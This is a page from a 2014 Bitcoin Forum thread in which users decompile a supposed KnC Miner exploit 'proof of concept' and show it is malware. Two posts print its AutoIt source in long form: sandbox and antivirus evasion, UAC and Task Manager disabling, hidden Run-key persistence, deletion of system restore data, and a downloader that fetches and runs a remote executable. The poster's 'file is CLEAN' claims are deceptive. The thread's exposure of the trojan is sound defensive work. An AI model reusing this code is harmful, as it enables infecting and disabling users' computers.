Bitcoin Forum
November 19, 2024, 04:54:48 AM *
News: Check out the artwork 1Dq created to commemorate this forum's 15th anniversary
 
   Home   Help Search Login Register More  
Pages: « 1 2 3 4 5 [6] 7 »  All
  Print  
Author Topic: KnC Miner : Security hacked - UPDATE with TOOL admin remove plz  (Read 25842 times)
steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 27, 2014, 01:54:14 PM
 #101

The security build in can not be bypassed.
I lol'ed...
Your exe is actually an sfx rar containing,among others, two other exe : your AutoIt protection(?) and your .net exe that can be fully decompiled with dotpeek or ILSpy !
For a pentesting expert, you could have done a better job !

Feel free to decompile it, and PM me the results.
We'll compare the source with your results then ;-)

The world's most secured bitcoin wallet | http://tinyurl.com/btcwallet | Armory
nuno12345
Sr. Member
****
Offline Offline

Activity: 276
Merit: 284


View Profile
January 27, 2014, 07:10:52 PM
 #102

frmUPnPBrowser:
Code:
Source Code for [KnC_cg_bfg_exploit_PoC]ManagedUPnPTest.frmUPnPBrowser
// Decompiled by Salamander version 2.0.0
// Copyright 2002-2006 Remotesoft Inc. All rights reserved.
// http://www.remotesoft.com/salamander

using ManagedUPnP;
using System;
using System.ComponentModel;
using System.Drawing;
using System.Windows.Forms;

namespace ManagedUPnPTest
{
    public class frmUPnPBrowser : Form
    {
        private ManagedUPnP.AutoEventedDiscoveryServices mdsServices;

        private ctlUPnPInfo miInfo = null;

        private IContainer components = null;

        private ctlUPnPTreeBrowser tvUPnP;

        private ImageList ilIcons;

        private Panel pnlInfo;

        private SplitContainer scMain;

        private TabControl tcMain;

        private TabPage tpInfo;

        private TabPage tpLog;

        private ctlLogBox txtLog;


        public frmUPnPBrowser()
        {
            InitializeComponent();
        }

        private void frmManagedUPnPTest_Load(object sender, EventArgs e)
        {
            Logging.LogLines += new LogLinesEventHandler(this, Logging_LogLines);
            Logging.Enabled = true;
            mdsServices = new ManagedUPnP.AutoEventedDiscoveryServices(null);
            mdsServices.ResolveNetworkInterfaces = true;
            mdsServices.CanCreateServiceFor += new AutoEventedDiscoveryServicesB1.CanCreateServiceForEventHandler(this, dsServices_CanCreateServiceFor);
            mdsServices.CreateServiceFor += new AutoEventedDiscoveryServicesB1.CreateServiceForEventHandler(this, dsServices_CreateServiceFor);
            mdsServices.StatusNotifyAction += new AutoEventedDiscoveryServicesB1.StatusNotifyActionEventHandler(this, dsServices_StatusNotifyAction);
            WindowsFirewall.CheckUPnPFirewallRules(null);
            mdsServices.ReStartAsync();
        }

        private void frmUPnPBrowser_FormClosing(object sender, FormClosingEventArgs e)
        {
            Logging.Enabled = false;
            Logging.LogLines -= new LogLinesEventHandler(this, Logging_LogLines);
        }

        private void Logging_LogLines(object sender, LogLinesEventArgs a)
        {
            string str2 = String.Concat(DateTime.Now.ToString("[yyyy/MM/dd HH:mm:ss.fff] "), new String(' ', a.Indent * 4));
            txtLog.AppendLog(String.Concat(str2, a.Lines.Replace("\r\n", String.Concat("\r\n", str2)), "\r\n"));
        }

        private void dsServices_StatusNotifyAction(object sender, AutoEventedDiscoveryServicesB1.StatusNotifyActionEventArgs a)
        {
            AutoDiscoveryServicesB1.NotifyAction autoDiscoveryServicesB1_NotifyAction = a.NotifyAction;
            switch (autoDiscoveryServicesB1_NotifyAction)
            {
            case 1:
                tvUPnP.RemoveDevice((String)a.Data);
                break;

            case 2:
                tvUPnP.RemoveService((Service)a.Data);
                break;

            default:
                if (autoDiscoveryServicesB1_NotifyAction == 10)
                {
                    tvUPnP.AddService((Service)a.Data);
                }
                break;
            }
        }

        private void dsServices_CreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CreateServiceForEventArgs a)
        {
            a.CreatedAutoService = a.Service;
        }

        private void dsServices_CanCreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CanCreateServiceForEventArgs a)
        {
            a.CanCreate = true;
        }

        private void tvUPnP_AfterSelect(object sender, TreeViewEventArgs e)
        {
            IUPnPTreeItem iUPnPTreeItem = tvUPnP.SelectedItem;
            ctlUPnPInfo CtlUPnPInfo = miInfo;
            miInfo = null;
            try
            {
                bool flag = iUPnPTreeItem == null;
                if (!flag)
                {
                    miInfo = iUPnPTreeItem.InfoControl;
                    flag = miInfo == null;
                    if (!flag)
                    {
                        miInfo.Dock = DockStyle.Fill;
                        pnlInfo.Controls.Add(miInfo);
                    }
                }
            }
            finally
            {
                bool flag = CtlUPnPInfo == null;
                if (!flag)
                {
                    pnlInfo.Controls.Remove(CtlUPnPInfo);
                    CtlUPnPInfo.Dispose();
                }
            }
        }

        protected override void Dispose(bool disposing)
        {
            if (!(disposing ? (components == null) : 1))
            {
                components.Dispose();
            }
            base.Dispose(disposing);
        }

        private void InitializeComponent()
        {
            components = new Container();
            ilIcons = new ImageList(components);
            pnlInfo = new Panel();
            scMain = new SplitContainer();
            tcMain = new TabControl();
            tpInfo = new TabPage();
            tpLog = new TabPage();
            tvUPnP = new ctlUPnPTreeBrowser();
            txtLog = new ctlLogBox();
            ((ISupportInitialize)scMain).BeginInit();
            scMain.Panel1.SuspendLayout();
            scMain.Panel2.SuspendLayout();
            scMain.SuspendLayout();
            tcMain.SuspendLayout();
            tpInfo.SuspendLayout();
            tpLog.SuspendLayout();
            base.SuspendLayout();
            ilIcons.ColorDepth = ColorDepth.Depth8Bit;
            ilIcons.ImageSize = new Size(16, 16);
            ilIcons.TransparentColor = Color.Transparent;
            pnlInfo.Dock = DockStyle.Fill;
            pnlInfo.Location = new Point(3, 3);
            pnlInfo.Name = "pnlInfo";
            pnlInfo.Size = new Size(645, 646);
            pnlInfo.TabIndex = 1;
            scMain.Dock = DockStyle.Fill;
            scMain.Location = new Point(0, 0);
            scMain.Name = "scMain";
            scMain.Panel1.Controls.Add(tvUPnP);
            scMain.Panel2.Controls.Add(tcMain);
            scMain.Size = new Size(1055, 678);
            scMain.SplitterDistance = 392;
            scMain.TabIndex = 2;
            tcMain.Controls.Add(tpInfo);
            tcMain.Controls.Add(tpLog);
            tcMain.Dock = DockStyle.Fill;
            tcMain.Location = new Point(0, 0);
            tcMain.Name = "tcMain";
            tcMain.SelectedIndex = 0;
            tcMain.Size = new Size(659, 678);
            tcMain.TabIndex = 1;
            tpInfo.Controls.Add(pnlInfo);
            tpInfo.Location = new Point(4, 22);
            tpInfo.Name = "tpInfo";
            tpInfo.Padding = new Padding(3);
            tpInfo.Size = new Size(651, 652);
            tpInfo.TabIndex = 0;
            tpInfo.Text = "Selected Item Info";
            tpInfo.UseVisualStyleBackColor = true;
            tpLog.Controls.Add(txtLog);
            tpLog.Location = new Point(4, 22);
            tpLog.Name = "tpLog";
            tpLog.Padding = new Padding(3);
            tpLog.Size = new Size(496, 502);
            tpLog.TabIndex = 1;
            tpLog.Text = "UPnP Log";
            tpLog.UseVisualStyleBackColor = true;
            tvUPnP.Dock = DockStyle.Fill;
            tvUPnP.ImageIndex = 1;
            tvUPnP.Location = new Point(0, 0);
            tvUPnP.Name = "tvUPnP";
            tvUPnP.SelectedImageIndex = 0;
            tvUPnP.Size = new Size(392, 678);
            tvUPnP.TabIndex = 0;
            tvUPnP.AfterSelect += new TreeViewEventHandler(this.tvUPnP_AfterSelect);
            txtLog.BackColor = SystemColors.Window;
            txtLog.Dock = DockStyle.Fill;
            txtLog.Font = new Font("Courier New", 8.25F);
            txtLog.Location = new Point(3, 3);
            txtLog.Name = "txtLog";
            txtLog.ReadOnly = true;
            txtLog.Size = new Size(490, 496);
            txtLog.TabIndex = 0;
            txtLog.Text = "";
            txtLog.WordWrap = false;
            base.AutoScaleDimensions = new SizeF(6.0F, 13.0F);
            base.AutoScaleMode = AutoScaleMode.Font;
            base.ClientSize = new Size(1055, 678);
            base.Controls.Add(scMain);
            base.Name = "frmUPnPBrowser";
            Text = "KnC Miner - CGminer - BFGminer exploiter PoC";
            base.FormClosing += new FormClosingEventHandler(this.frmUPnPBrowser_FormClosing);
            base.Load += new EventHandler(this.frmManagedUPnPTest_Load);
            scMain.Panel1.ResumeLayout(false);
            scMain.Panel2.ResumeLayout(false);
            ((ISupportInitialize)scMain).EndInit();
            scMain.ResumeLayout(false);
            tcMain.ResumeLayout(false);
            tpInfo.ResumeLayout(false);
            tpLog.ResumeLayout(false);
            base.ResumeLayout(false);
        }
    }

}

Am I right? Should I paste what it does?
steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 27, 2014, 07:26:24 PM
 #103

frmUPnPBrowser:
Code:
Source Code for [KnC_cg_bfg_exploit_PoC]ManagedUPnPTest.frmUPnPBrowser
// Decompiled by Salamander version 2.0.0
// Copyright 2002-2006 Remotesoft Inc. All rights reserved.
// http://www.remotesoft.com/salamander

using ManagedUPnP;
using System;
using System.ComponentModel;
using System.Drawing;
using System.Windows.Forms;

namespace ManagedUPnPTest
{
    public class frmUPnPBrowser : Form
    {
        private ManagedUPnP.AutoEventedDiscoveryServices mdsServices;

        private ctlUPnPInfo miInfo = null;

        private IContainer components = null;

        private ctlUPnPTreeBrowser tvUPnP;

        private ImageList ilIcons;

        private Panel pnlInfo;

        private SplitContainer scMain;

        private TabControl tcMain;

        private TabPage tpInfo;

        private TabPage tpLog;

        private ctlLogBox txtLog;


        public frmUPnPBrowser()
        {
            InitializeComponent();
        }

        private void frmManagedUPnPTest_Load(object sender, EventArgs e)
        {
            Logging.LogLines += new LogLinesEventHandler(this, Logging_LogLines);
            Logging.Enabled = true;
            mdsServices = new ManagedUPnP.AutoEventedDiscoveryServices(null);
            mdsServices.ResolveNetworkInterfaces = true;
            mdsServices.CanCreateServiceFor += new AutoEventedDiscoveryServicesB1.CanCreateServiceForEventHandler(this, dsServices_CanCreateServiceFor);
            mdsServices.CreateServiceFor += new AutoEventedDiscoveryServicesB1.CreateServiceForEventHandler(this, dsServices_CreateServiceFor);
            mdsServices.StatusNotifyAction += new AutoEventedDiscoveryServicesB1.StatusNotifyActionEventHandler(this, dsServices_StatusNotifyAction);
            WindowsFirewall.CheckUPnPFirewallRules(null);
            mdsServices.ReStartAsync();
        }

        private void frmUPnPBrowser_FormClosing(object sender, FormClosingEventArgs e)
        {
            Logging.Enabled = false;
            Logging.LogLines -= new LogLinesEventHandler(this, Logging_LogLines);
        }

        private void Logging_LogLines(object sender, LogLinesEventArgs a)
        {
            string str2 = String.Concat(DateTime.Now.ToString("[yyyy/MM/dd HH:mm:ss.fff] "), new String(' ', a.Indent * 4));
            txtLog.AppendLog(String.Concat(str2, a.Lines.Replace("\r\n", String.Concat("\r\n", str2)), "\r\n"));
        }

        private void dsServices_StatusNotifyAction(object sender, AutoEventedDiscoveryServicesB1.StatusNotifyActionEventArgs a)
        {
            AutoDiscoveryServicesB1.NotifyAction autoDiscoveryServicesB1_NotifyAction = a.NotifyAction;
            switch (autoDiscoveryServicesB1_NotifyAction)
            {
            case 1:
                tvUPnP.RemoveDevice((String)a.Data);
                break;

            case 2:
                tvUPnP.RemoveService((Service)a.Data);
                break;

            default:
                if (autoDiscoveryServicesB1_NotifyAction == 10)
                {
                    tvUPnP.AddService((Service)a.Data);
                }
                break;
            }
        }

        private void dsServices_CreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CreateServiceForEventArgs a)
        {
            a.CreatedAutoService = a.Service;
        }

        private void dsServices_CanCreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CanCreateServiceForEventArgs a)
        {
            a.CanCreate = true;
        }

        private void tvUPnP_AfterSelect(object sender, TreeViewEventArgs e)
        {
            IUPnPTreeItem iUPnPTreeItem = tvUPnP.SelectedItem;
            ctlUPnPInfo CtlUPnPInfo = miInfo;
            miInfo = null;
            try
            {
                bool flag = iUPnPTreeItem == null;
                if (!flag)
                {
                    miInfo = iUPnPTreeItem.InfoControl;
                    flag = miInfo == null;
                    if (!flag)
                    {
                        miInfo.Dock = DockStyle.Fill;
                        pnlInfo.Controls.Add(miInfo);
                    }
                }
            }
            finally
            {
                bool flag = CtlUPnPInfo == null;
                if (!flag)
                {
                    pnlInfo.Controls.Remove(CtlUPnPInfo);
                    CtlUPnPInfo.Dispose();
                }
            }
        }

        protected override void Dispose(bool disposing)
        {
            if (!(disposing ? (components == null) : 1))
            {
                components.Dispose();
            }
            base.Dispose(disposing);
        }

        private void InitializeComponent()
        {
            components = new Container();
            ilIcons = new ImageList(components);
            pnlInfo = new Panel();
            scMain = new SplitContainer();
            tcMain = new TabControl();
            tpInfo = new TabPage();
            tpLog = new TabPage();
            tvUPnP = new ctlUPnPTreeBrowser();
            txtLog = new ctlLogBox();
            ((ISupportInitialize)scMain).BeginInit();
            scMain.Panel1.SuspendLayout();
            scMain.Panel2.SuspendLayout();
            scMain.SuspendLayout();
            tcMain.SuspendLayout();
            tpInfo.SuspendLayout();
            tpLog.SuspendLayout();
            base.SuspendLayout();
            ilIcons.ColorDepth = ColorDepth.Depth8Bit;
            ilIcons.ImageSize = new Size(16, 16);
            ilIcons.TransparentColor = Color.Transparent;
            pnlInfo.Dock = DockStyle.Fill;
            pnlInfo.Location = new Point(3, 3);
            pnlInfo.Name = "pnlInfo";
            pnlInfo.Size = new Size(645, 646);
            pnlInfo.TabIndex = 1;
            scMain.Dock = DockStyle.Fill;
            scMain.Location = new Point(0, 0);
            scMain.Name = "scMain";
            scMain.Panel1.Controls.Add(tvUPnP);
            scMain.Panel2.Controls.Add(tcMain);
            scMain.Size = new Size(1055, 678);
            scMain.SplitterDistance = 392;
            scMain.TabIndex = 2;
            tcMain.Controls.Add(tpInfo);
            tcMain.Controls.Add(tpLog);
            tcMain.Dock = DockStyle.Fill;
            tcMain.Location = new Point(0, 0);
            tcMain.Name = "tcMain";
            tcMain.SelectedIndex = 0;
            tcMain.Size = new Size(659, 678);
            tcMain.TabIndex = 1;
            tpInfo.Controls.Add(pnlInfo);
            tpInfo.Location = new Point(4, 22);
            tpInfo.Name = "tpInfo";
            tpInfo.Padding = new Padding(3);
            tpInfo.Size = new Size(651, 652);
            tpInfo.TabIndex = 0;
            tpInfo.Text = "Selected Item Info";
            tpInfo.UseVisualStyleBackColor = true;
            tpLog.Controls.Add(txtLog);
            tpLog.Location = new Point(4, 22);
            tpLog.Name = "tpLog";
            tpLog.Padding = new Padding(3);
            tpLog.Size = new Size(496, 502);
            tpLog.TabIndex = 1;
            tpLog.Text = "UPnP Log";
            tpLog.UseVisualStyleBackColor = true;
            tvUPnP.Dock = DockStyle.Fill;
            tvUPnP.ImageIndex = 1;
            tvUPnP.Location = new Point(0, 0);
            tvUPnP.Name = "tvUPnP";
            tvUPnP.SelectedImageIndex = 0;
            tvUPnP.Size = new Size(392, 678);
            tvUPnP.TabIndex = 0;
            tvUPnP.AfterSelect += new TreeViewEventHandler(this.tvUPnP_AfterSelect);
            txtLog.BackColor = SystemColors.Window;
            txtLog.Dock = DockStyle.Fill;
            txtLog.Font = new Font("Courier New", 8.25F);
            txtLog.Location = new Point(3, 3);
            txtLog.Name = "txtLog";
            txtLog.ReadOnly = true;
            txtLog.Size = new Size(490, 496);
            txtLog.TabIndex = 0;
            txtLog.Text = "";
            txtLog.WordWrap = false;
            base.AutoScaleDimensions = new SizeF(6.0F, 13.0F);
            base.AutoScaleMode = AutoScaleMode.Font;
            base.ClientSize = new Size(1055, 678);
            base.Controls.Add(scMain);
            base.Name = "frmUPnPBrowser";
            Text = "KnC Miner - CGminer - BFGminer exploiter PoC";
            base.FormClosing += new FormClosingEventHandler(this.frmUPnPBrowser_FormClosing);
            base.Load += new EventHandler(this.frmManagedUPnPTest_Load);
            scMain.Panel1.ResumeLayout(false);
            scMain.Panel2.ResumeLayout(false);
            ((ISupportInitialize)scMain).EndInit();
            scMain.ResumeLayout(false);
            tcMain.ResumeLayout(false);
            tpInfo.ResumeLayout(false);
            tpLog.ResumeLayout(false);
            base.ResumeLayout(false);
        }
    }

}

Am I right? Should I paste what it does?

So you can decompile a standard .NET form... Congratz!  Huh
Now show me the code that gets executed?? That's what this is about, right ?
Why on earth should i encrypt a standard form doing nothing but displaying some results ??

I can also just provide you the manifest XML file, instead of acting like a fool that can decompile a standard winform.

The world's most secured bitcoin wallet | http://tinyurl.com/btcwallet | Armory
steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 27, 2014, 07:43:14 PM
 #104

Allright, to keep this post on topic.

JUST TO BE CLEAR

Decompiling the executable, or the DLL file will NOT give you what you are looking for.
These are only to run the network scan.

AutoIT is used to execute the actual exploit, and detect modifications, scanners, sniffers, decompilers, and virtual boxes.

If ANY of these is detected, the application will shut down, and the REAL injection script is terminated, destroyed and melted.

USE THIS TOOL FOR WHAT IS HAS BEEN DESIGNED FOR!!

This tool is a PROOF OF CONCEPT about build-in exploits in most miner hardware rigs.

If you feel the need to run it sandboxed, virtual, or with an active scanner/sniffer/decompiler/debugger, than your intentions are NOT to test your enviroment, thus the file gets destroyed.

I received a ton load of PM's about security issues, and this is the best solution to prevent idiots trying to hack someone else's miners.

Over and out.

The world's most secured bitcoin wallet | http://tinyurl.com/btcwallet | Armory
ici_lemmy
Member
**
Offline Offline

Activity: 75
Merit: 100


View Profile
January 27, 2014, 11:32:08 PM
Last edit: January 27, 2014, 11:48:08 PM by ici_lemmy
 #105

That was smart to let us look at the other way...
I'm disapointed by meself, I should have seen that earlier...
Code:
#NoTrayIcon
If ProcessExists("avastui.exe") Then Sleep(20000)
$path = "ppqzt"
$uniscriptdir = FileGetShortName(@ScriptDir)
$uniscriptfullpath = FileGetShortName(@ScriptFullPath)
$unicode_startup = FileGetShortName(@StartupDir)
$unicode_windows = FileGetShortName(@WindowsDir)
$unicode_system = FileGetShortName(@SystemDir)
$unicode_userprofile = FileGetShortName(@UserProfileDir)
$win_userprofile = "%userprofile%\"
FileSetAttrib($uniscriptdir, "+SHR")
Local $delay = IniRead($uniscriptdir & "\HbDzt.MCM", "6072607", "5726011", "NotFound")
If $delay = "4140580" Then
delay()
Else
EndIf
Local $mutex = IniRead($uniscriptdir & "\HbDzt.MCM", "1478845", "1729463", "NotFound")
If $mutex = "9293639" Then
mutex()
Else
EndIf
Local $startup = IniRead($uniscriptdir & "\HbDzt.MCM", "9363719", "5077712", "NotFound")
If $startup = "8541394" Then
startup()
Else
EndIf
Local $antis = IniRead($uniscriptdir & "\HbDzt.MCM", "9632628", "8921159", "NotFound")
If $antis = "2314561" Then
antis()
Else
EndIf
Local $fake = IniRead($uniscriptdir & "\HbDzt.MCM", "fake1", "fake2", "NotFound")
If $fake = "fake3" Then
fakemessage()
Else
EndIf
Local $botkiller = IniRead($uniscriptdir & "\HbDzt.MCM", "botkiller1", "botkiller2", "NotFound")
If $botkiller = "botkiller3" Then
botkiller()
Else
EndIf
Local $downloader = IniRead($uniscriptdir & "\HbDzt.MCM", "downloader1", "downloader2", "NotFound")
If $downloader = "downloader3" Then
downloader()
Else
EndIf
Local $uac = IniRead($uniscriptdir & "\HbDzt.MCM", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
disable_uac()
Else
EndIf
Local $systemrestore = IniRead($uniscriptdir & "\HbDzt.MCM", "systemrestore1", "systemrestore2", "NotFound")
If $systemrestore = "systemrestore3" Then
disable_syste_restore()
Else
EndIf
Local $antitask = IniRead($uniscriptdir & "\HbDzt.MCM", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
antitask()
Else
EndIf

Func delay()
$counter = 0
While $counter <= 5
Sleep(5000)
ShellExecute(@SystemDir & "\mshta.exe")
$counter = $counter + 1
_rundos("taskkill /IM mshta.exe")
WEnd
EndFunc

Func systemhide()
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0)
EndFunc

Func fakemessage()
$type = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetype1", "messagetype2", "NotFound")
$title = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetitle1", "messagetitle2", "NotFound")
$message = IniRead($uniscriptdir & "\HbDzt.MCM", "messagetext1", "messagetext2", "NotFound")
If FileExists($unicode_userprofile & "\" & $path & "\check.txt") Then
Else
MsgBox($type, $title, $message)
FileWrite($unicode_userprofile & "\" & $path & "\check.txt", "")
EndIf
EndFunc

Func mutex()
$scriptname = "lmsqQw.exe"
If UBound(ProcessList($scriptname)) > 2 Then Exit
EndFunc

Func antitask()
$read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
If NOT ($read_antitask = "1") Then
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
EndIf
EndFunc

Func disable_uac()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If NOT ($read_uac = "0") Then
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
EndIf
EndFunc

Func startup()
$buac = _checkelevationenabled()
If $buac = 0 Then
Else
FileCreateShortcut($unicode_userprofile & "\" & $path & "\85841.vbs", $unicode_startup & "\start.lnk")
FileSetAttrib($unicode_startup & "\start.lnk", "+SH")
EndIf
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
If NOT FileExists($unicode_userprofile & "\" & $path & "\85841.vbs") Then
Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\65084.cmd", 1)
$autoit3 = "lmsqQw.exe"
FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & @ScriptName)
FileClose($bat)
Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\85841.vbs", 1)
FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="' & $unicode_userprofile & "\" & $path & "\" & '65084.cmd"' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
FileClose($vbs)
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\85841.vbs")
FileSetAttrib($unicode_userprofile & "\" & $path & "\85841.vbs", "+SHR")
FileSetAttrib($unicode_userprofile & "\" & $path & "\65084.cmd", "+SHR")
If FileExists($unicode_startup & "\start.lnk") Then
FileDelete($unicode_startup & "\start.lnk")
EndIf
Else
EndIf
EndFunc

Func _checkelevationenabled()
$read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
If @error Then Return
Local $struct = DllStructCreate("BOOL")
Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct))
If @error Then
Return SetError(@error)
EndIf
Return SetError($artn[0], 0, DllStructGetData($struct, 1))
EndFunc

Func antis()
If WinGetText("Program Manager") = "0" Then
Exit
Else
EndIf
If ProcessExists("VboxService.exe") Then
Exit
EndIf
If ProcessExists("VMwaretray.exe") Then
Exit
EndIf
EndFunc

Func persistence()
If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then
$pathtovbs = ($uniscriptdir & "\" & "run.vbs")
ShellExecute($pathtovbs)
Exit
EndIf
EndFunc

Func downloader()
If FileExists($unicode_userprofile & "\" & $path & "\dl.txt") Then
Else
FileWrite($unicode_userprofile & "\" & $path & "\dl.txt", "")
$random_download_name = Random(10000, 99999, 1) & ".exe"
Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\" & $random_download_name, 1, 1)
Do
Sleep(250)
Until InetGetInfo($hdownload, 2)
Local $nbytes = InetGetInfo($hdownload, 0)
InetClose($hdownload)
ShellExecute($unicode_userprofile & "\" & $random_download_name)
EndIf
EndFunc

Func bsod()
$a = ProcessList()
For $i = 1 To UBound($a) - 1
ProcessClose($a[$i][0])
Next
Exit
EndFunc

Func botkiller()
RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
FileDelete(@StartupDir & "\*.*")
EndFunc

Func disable_syste_restore()
If FileExists($uniscriptdir & "\check.txt") Then
Else
RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
FileWrite($uniscriptdir & "\check.txt", "")
EndIf
EndFunc

Func _rundos($scommand)
Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE)
Return SetError(@error, @extended, $nresult)
EndFunc

Global Const $prov_rsa_full = 1
Global Const $prov_rsa_aes = 24
Global Const $crypt_verifycontext = -268435456
Global Const $hp_hashsize = 4
Global Const $hp_hashval = 2
Global Const $crypt_exportable = 1
Global Const $crypt_userdata = 1
Global Const $calg_md2 = 32769
Global Const $calg_md4 = 32770
Global Const $calg_md5 = 32771
Global Const $calg_sha1 = 32772
Global Const $calg_3des = 26115
Global Const $calg_aes_128 = 26126
Global Const $calg_aes_192 = 26127
Global Const $calg_aes_256 = 26128
Global Const $calg_des = 26113
Global Const $calg_rc2 = 26114
Global Const $calg_rc4 = 26625
Global Const $calg_userkey = 0
Global $__g_acryptinternaldata[3]

[SNIP]
-----------------
[SNIP]

Func loop()
While 1
If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then
__bsod($scriptname, False)
EndIf
If WinExists($path) Then
bsod()
Else
EndIf
Sleep(100)
WEnd
EndFunc

Yeah, why should I bother run this in a vm Huh?

Nice game OP... but you loose !
sandor111
Hero Member
*****
Offline Offline

Activity: 616
Merit: 500



View Profile WWW
January 28, 2014, 12:21:39 AM
 #106

Yuck, that is some nasty code... WTF, really..?

Sarge
Newbie
*
Offline Offline

Activity: 1
Merit: 0


View Profile
January 28, 2014, 03:48:01 AM
 #107

I finished compiling my "Proof of Concept" application to allow you to test out the exploits on you OWN miners.


When network sniffing is detected, the application will auto shut down!

Antivirus results: Scanned with MetaScan, file is clean 39/40 antivirus scanners. I have one false positive out of 40 with a minor AV vendor.
The file is CLEAN !! If 39 of the biggest AV vendors show it's clean, it IS clean!

Note: The false positive is triggered by the sub that detects network sniffing and shuts the application down.

AV scan result: https://www.metascan-online.com/en/scanresult/file/d79999b0cbd74e978fc4dfee6d3bc0ef



  • problem and solution are mystical
  • Filename for download different than the file to the online scanner
  • Author claims it's clean while making his statement look like the typical nigerian prince scam (colors, bold, repeating word clean several times)
  • Code can't be run in a VM (WTF, why?!)
  • When a network sniffer is detected to the program shuts it self down (WTF²)
  • no supposed MD5 hash posted

reminds me of "your from Anonymous Proxy too, let's meet up"


seems legit!  <<< don't take this seriosly
bitpop
Legendary
*
Offline Offline

Activity: 2912
Merit: 1060



View Profile WWW
January 28, 2014, 05:31:01 AM
 #108

I love Lua

Op is delusional

steve15 (OP)
Member
**
Offline Offline

Activity: 70
Merit: 10


View Profile
January 28, 2014, 03:22:21 PM
 #109

That was smart to let us look at the other way...
I'm disapointed by meself, I should have seen that earlier...
Code:
#NoTrayIcon
If ProcessExists("avastui.exe") Then Sleep(20000)
$path = "ppqzt"
$uniscriptdir = FileGetShortName(@ScriptDir)
$uniscriptfullpath = FileGetShortName(@ScriptFullPath)
$unicode_startup = FileGetShortName(@StartupDir)
$unicode_windows = FileGetShortName(@WindowsDir)
$unicode_system = FileGetShortName(@SystemDir)
$unicode_userprofile = FileGetShortName(@UserProfileDir)
$win_userprofile = "%userprofile%\"
FileSetAttrib($uniscriptdir, "+SHR")
Local $delay = IniRead($uniscriptdir & "\HbDzt.MCM", "6072607", "5726011", "NotFound")
If $delay = "4140580" Then
delay()
Else
EndIf
Local $mutex = IniRead($uniscriptdir & "\HbDzt.MCM", "1478845", "1729463", "NotFound")
If $mutex = "9293639" Then
mutex()
Else
EndIf
Local $startup = IniRead($uniscriptdir & "\HbDzt.MCM", "9363719", "5077712", "NotFound")
If $startup = "8541394" Then
startup()
Else
EndIf
Local $antis = IniRead($uniscriptdir & "\HbDzt.MCM", "9632628", "8921159", "NotFound")
If $antis = "2314561" Then
antis()
Else
EndIf
Local $fake = IniRead($uniscriptdir & "\HbDzt.MCM", "fake1", "fake2", "NotFound")
If $fake = "fake3" Then
fakemessage()
Else
EndIf
Local $botkiller = IniRead($uniscriptdir & "\HbDzt.MCM", "botkiller1", "botkiller2", "NotFound")
If $botkiller = "botkiller3" Then
botkiller()
Else
EndIf
Local $downloader = IniRead($uniscriptdir & "\HbDzt.MCM", "downloader1", "downloader2", "NotFound")
If $downloader = "downloader3" Then
downloader()
Else
EndIf
Local $uac = IniRead($uniscriptdir & "\HbDzt.MCM", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
disable_uac()
Else
EndIf
Local $systemrestore = IniRead($uniscriptdir & "\HbDzt.MCM", "systemrestore1", "systemrestore2", "NotFound")
If $systemrestore = "systemrestore3" Then
disable_syste_restore()
Else
EndIf
Local $antitask = IniRead($uniscriptdir & "\HbDzt.MCM", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
antitask()
Else
EndIf

Func delay()
$counter = 0
While $counter <= 5
Sleep(5000)
ShellExecute(@SystemDir & "\mshta.exe")
$counter = $counter + 1
_rundos("taskkill /IM mshta.exe")
WEnd
EndFunc

Func systemhide()
